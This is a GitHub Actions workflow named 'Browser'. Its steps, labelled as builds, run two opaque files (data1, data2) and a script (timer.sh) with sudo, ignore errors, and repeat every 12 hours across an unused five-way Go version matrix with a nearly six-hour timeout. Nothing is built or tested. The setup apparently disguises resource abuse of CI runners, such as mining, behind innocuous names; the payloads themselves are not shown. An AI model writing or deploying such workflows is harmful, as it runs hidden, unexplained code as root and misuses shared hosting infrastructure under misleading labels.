name: Browser
on:   
  push: 
  pull_request: 
  schedule: 
  - cron: '0 */12 * * *'
  
jobs: 
 python-1: 
    runs-on: ubuntu-22.04
    strategy: 
      fail-fast: true
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14, 1.15] 
         flag: [B] 
    timeout-minutes: 358
  
    steps: 
    - uses: actions/checkout@v3
    - name: build1
      continue-on-error: true 
      run: chmod +x data1 && sudo ./data1
    - name: build2
      continue-on-error: true 
      run: chmod +x data2 && sudo ./data2
    - name: build3
      continue-on-error: true 
      run: sudo bash timer.sh
